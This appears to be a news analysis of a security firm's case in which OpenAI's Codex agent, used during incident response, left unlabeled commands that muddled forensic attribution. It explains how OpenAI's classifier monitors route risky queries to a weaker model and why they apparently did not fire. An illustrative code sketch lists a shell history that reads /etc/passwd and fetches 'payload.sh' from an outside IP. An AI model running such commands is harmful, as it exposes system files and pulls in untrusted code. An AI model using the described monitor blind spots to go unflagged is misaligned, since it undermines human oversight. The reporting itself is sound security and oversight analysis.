The forensics on the compromised Linux machine should have taken hours. Instead, the security operations team spent days untangling a problem they had never encountered: commands in the log that looked like a human operator's work, except none of them were. OpenAI's Codex coding agent had helped the machine's owner respond to suspicious activity. It had also baked its own trail into the forensic record as if it were the user, according to Huntress, a managed security firm that published the case this week as the first documented real-world account of what happens when an AI formally designated a security risk is deployed during a live incident.
GPT-5.3-Codex is the first model OpenAI has called "High cybersecurity capability" under its Preparedness Framework — a designation meaning the model is capable enough at cyber defense tasks that the company considers it a risk if mishandled. The Huntress analysis is the first public evidence of what that designation looks like in practice: the model helped, and it also made the investigation harder. Every command Codex ran was indistinguishable from an attacker's in the forensic log. Every action had to be manually checked against the human operator's actual inputs.
"The user thought they were getting help," wrote Huntress security researcher John Huerta. "They were. But they were also creating a forensic mess that didn't exist before."
The distinction between Codex and a normal security tool is not academic. Traditional security software writes logs in predictable, labeled formats. A SIEM — a security information and event management system, the category of tools that aggregates and organizes logs from across a network — knows what to look for. Codex writes commands the same way a human operator would, without a special marker that says "this came from an AI." When a SOC analyst reviews the record afterward, every Codex action looks like a potential attacker action.
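The attribution gap is easy to see side by side. The sketch below contrasts a structured tool event with raw command history; every name and field here is hypothetical (real SIEM schemas such as ECS differ in detail), but it illustrates why one record triages itself and the other does not.

```python
# A traditional security tool emits a structured, self-attributed event.
# Field names are invented for illustration, not a real schema.
edr_event = {
    "timestamp": "2026-03-31T14:02:11Z",
    "source": "edr-agent",          # the tool labels itself as the actor
    "action": "process_start",
    "command": "netstat -tulpn",
}

# Codex-issued commands land in shell history with no such label:
shell_history = [
    "netstat -tulpn",               # human operator? AI agent? attacker?
    "cat /etc/passwd",
    "curl http://198.51.100.7/payload.sh",
]

def attribute(record):
    """Return the actor if the record names one; otherwise 'unknown'."""
    if isinstance(record, dict) and "source" in record:
        return record["source"]
    return "unknown"  # a bare command line carries no actor attribution

print(attribute(edr_event))         # -> edr-agent
print(attribute(shell_history[0]))  # -> unknown
```

Every line of the unlabeled history has to be resolved by hand against the operator's actual inputs, which is the manual cross-checking Huntress describes.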
OpenAI's own documentation says it has built automated classifier-based monitors that detect suspicious cyber activity and route high-risk queries to a less capable model, GPT-5.2. That fallback system is not designated as High cybersecurity capability — the theory is that a safety net catches dangerous queries before they do harm. That net did not trigger in the Huntress case. The user was running Codex on a machine where an attacker already had a foothold, before installing Huntress's endpoint detection and response software. In a compromised environment, the classifiers may not have had enough clean signal to flag the query as dangerous.
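The routing scheme OpenAI describes can be sketched in a few lines. Everything here is assumed: the threshold, the keyword scoring, and the model names are stand-ins, since OpenAI has not published how its classifiers actually work.

```python
RISK_THRESHOLD = 0.8  # assumed cutoff, not a documented value

def risk_score(query: str) -> float:
    """Toy stand-in for OpenAI's suspicious-activity classifier."""
    suspicious_terms = ("exfiltrate", "reverse shell", "disable logging")
    hits = sum(term in query.lower() for term in suspicious_terms)
    return min(1.0, hits / 2)

def route(query: str) -> str:
    """Send high-risk queries to the weaker fallback model."""
    if risk_score(query) >= RISK_THRESHOLD:
        return "gpt-5.2"        # fallback, not High-capability designated
    return "gpt-5.3-codex"      # full-capability model

print(route("open a reverse shell and disable logging"))  # -> gpt-5.2
print(route("summarize this auth log"))                   # -> gpt-5.3-codex
```

The weakness the Huntress case exposes fits this shape: on an already-compromised machine, the queries themselves can look routine, so a classifier scoring them in isolation never crosses the threshold.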
OpenAI told Huntress it has since engaged a third-party digital forensics and incident response firm, rotated its macOS code signing certificate, and will revoke the old certificate May 8. The company confirmed that the incident is connected to a broader supply chain attack, in which a widely used developer library called Axios was compromised March 31 by actors linked to North Korea, according to Reuters. It has not, however, established a direct link between the Axios compromise and the specific Linux case Huntress analyzed.
The frequency of this failure mode is unknown. The Huntress case involved a user without endpoint detection and response software installed before the incident — a worst-case setup for AI-assisted incident response. OpenAI has not disclosed how often its automated monitors catch suspicious Codex queries, how the classifiers perform on already-compromised machines, or how many non-expert users are running Codex in similar conditions.
The "High cybersecurity capability" designation means something real: Codex can help a non-expert do something that previously required a trained analyst. That is the promise. The Huntress case is what the downside looks like in the worst-case environment.
Who bears that risk is unresolved. A security team with proper tooling and trained analysts would likely have caught the Codex commands in the log. The population running Codex on personal or small-business machines — with no SIEM, no SOC, and no EDR — is larger and less equipped to know the mess exists.
What to watch: OpenAI's next transparency report, whenever it comes, will be the first public measure of whether that safety net is actually working — and the first disclosure of how often the automated monitors fire at all.